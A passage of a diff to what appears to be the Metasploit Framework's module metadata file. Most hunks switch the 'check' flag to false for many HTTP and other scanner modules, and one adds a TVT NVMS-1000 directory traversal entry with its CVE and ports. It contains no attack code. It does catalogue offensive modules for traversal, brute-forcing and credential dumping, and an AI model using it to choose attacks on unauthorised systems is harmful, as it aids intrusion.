    "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_xml_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28589,7 +28773,7 @@
    "path": "/modules/auxiliary/scanner/http/replace_ext.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/replace_ext",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28636,7 +28820,7 @@
    "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rewrite_proxy_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28682,7 +28866,7 @@
    "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rfcode_reader_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28730,7 +28914,7 @@
    "path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rips_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28777,7 +28961,7 @@
    "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28823,7 +29007,7 @@
    "path": "/modules/auxiliary/scanner/http/robots_txt.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/robots_txt",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28871,7 +29055,7 @@
    "path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/s40_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28917,7 +29101,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28964,7 +29148,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute_web",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29010,7 +29194,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29056,7 +29240,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_version_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29102,7 +29286,7 @@
    "path": "/modules/auxiliary/scanner/http/scraper.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/scraper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29148,7 +29332,7 @@
    "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sentry_cdu_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29194,7 +29378,7 @@
    "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/servicedesk_plus_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29240,7 +29424,7 @@
    "path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sevone_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29290,7 +29474,7 @@
    "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/simple_webserver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29340,7 +29524,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_49152_exposure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29389,7 +29573,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29428,7 +29612,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29476,7 +29660,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29522,7 +29706,7 @@
    "path": "/modules/auxiliary/scanner/http/soap_xml.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/soap_xml",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29569,7 +29753,7 @@
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29616,7 +29800,7 @@
    "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/splunk_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29664,7 +29848,7 @@
    "path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/springcloud_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29710,7 +29894,7 @@
    "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squid_pivot_scanning",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29757,7 +29941,7 @@
    "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squiz_matrix_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29796,7 +29980,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29844,7 +30028,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29894,7 +30078,7 @@
    "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/support_center_plus_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29986,7 +30170,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30032,7 +30216,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_wcdb_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30082,7 +30266,7 @@
    "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sybase_easerver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30130,7 +30314,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30181,7 +30365,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_logfile",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30227,7 +30411,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_web_gateway_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30278,7 +30462,7 @@
    "path": "/modules/auxiliary/scanner/http/thinvnc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/thinvnc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30324,7 +30508,7 @@
    "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/titan_ftp_admin_pwd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30370,7 +30554,7 @@
    "path": "/modules/auxiliary/scanner/http/title.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/title",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30419,7 +30603,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30488,7 +30672,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30588,7 +30772,7 @@
    "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tplink_traversal_noauth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30636,7 +30820,7 @@
    "path": "/modules/auxiliary/scanner/http/trace.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30682,7 +30866,55 @@
    "path": "/modules/auxiliary/scanner/http/trace_axd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace_axd",
-    "check": true,
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/tvt_nvms_traversal": {
+    "name": "TVT NVMS-1000 Directory Traversal",
+    "fullname": "auxiliary/scanner/http/tvt_nvms_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-12",
+    "type": "auxiliary",
+    "author": [
+      "Numan Türle",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability which\n        exists in TVT network surveillance management software-1000 version 3.4.1.\n        NVMS listens by default on port 80.",
+    "references": [
+      "CVE-2019-20085",
+      "EDB-47774"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-21 08:43:19 +0000",
+    "path": "/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/tvt_nvms_traversal",
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30728,7 +30960,7 @@
    "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/typo3_bruteforce",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30774,7 +31006,7 @@
    "path": "/modules/auxiliary/scanner/http/vcms_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vcms_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30820,7 +31052,7 @@
    "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/verb_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30866,7 +31098,7 @@
    "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vhost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30913,7 +31145,7 @@
    "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wangkongbao_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30959,7 +31191,7 @@
    "path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/web_vulndb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31005,7 +31237,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31051,7 +31283,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31097,7 +31329,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_website_content",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31145,7 +31377,7 @@
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31194,7 +31426,7 @@
    "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wildfly_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31295,7 +31527,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_cp_calendar_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31349,7 +31581,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_ghost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31399,7 +31631,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_login_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31448,7 +31680,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31499,7 +31731,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_pingback_access",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31545,7 +31777,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31593,7 +31825,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31693,7 +31925,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_contus_video_gallery_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31743,7 +31975,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_dukapress_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31791,7 +32023,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_gimedia_library_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31840,7 +32072,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31888,7 +32120,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobileedition_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31936,7 +32168,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_nextgen_galley_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31984,7 +32216,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_simple_backup_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32033,7 +32265,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_subscribe_comments_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32079,7 +32311,7 @@
    "path": "/modules/auxiliary/scanner/http/xpath.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/xpath",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32127,7 +32359,7 @@
    "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/yaws_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32173,7 +32405,7 @@
    "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zabbix_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32220,7 +32452,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32267,7 +32499,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32308,7 +32540,7 @@
    "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
    "is_install_path": true,
    "ref_name": "scanner/ike/cisco_ike_benigncertain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32345,7 +32577,7 @@
    "path": "/modules/auxiliary/scanner/imap/imap_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/imap/imap_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32382,7 +32614,7 @@
    "path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
    "is_install_path": true,
    "ref_name": "scanner/ip/ipidseq",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32424,7 +32656,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_cipher_zero",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32466,7 +32698,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_dumphashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -32504,7 +32736,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32579,7 +32811,7 @@
    "path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/kademlia/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32616,7 +32848,7 @@
    "path": "/modules/auxiliary/scanner/llmnr/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/llmnr/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32662,7 +32894,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32708,7 +32940,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32754,7 +32986,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32791,7 +33023,7 @@
    "path": "/modules/auxiliary/scanner/mdns/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/mdns/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32831,7 +33063,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32868,7 +33100,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_udp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32905,7 +33137,7 @@
    "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cctv_dvr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32947,7 +33179,7 @@
    "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cisco_smart_install",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32987,7 +33219,7 @@
    "path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/clamav_control",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33028,7 +33260,7 @@
    "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33076,7 +33308,7 @@
    "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dvr_config_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33114,7 +33346,7 @@
    "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/easycafe_server_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33152,7 +33384,7 @@
    "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ib_service_mgr_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33189,7 +33421,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_channel_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33226,7 +33458,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33263,7 +33495,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33302,7 +33534,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_jmx_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33342,7 +33574,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_rmi_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33379,7 +33611,7 @@
    "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/oki_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33416,7 +33648,7 @@
    "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/poisonivy_control_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33454,7 +33686,7 @@
    "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/raysharp_dvr_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33491,7 +33723,7 @@
    "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/rosewill_rxs3211_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33531,7 +33763,7 @@
    "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sercomm_backdoor_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33564,11 +33796,11 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sunrpc_portmapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33608,7 +33840,7 @@
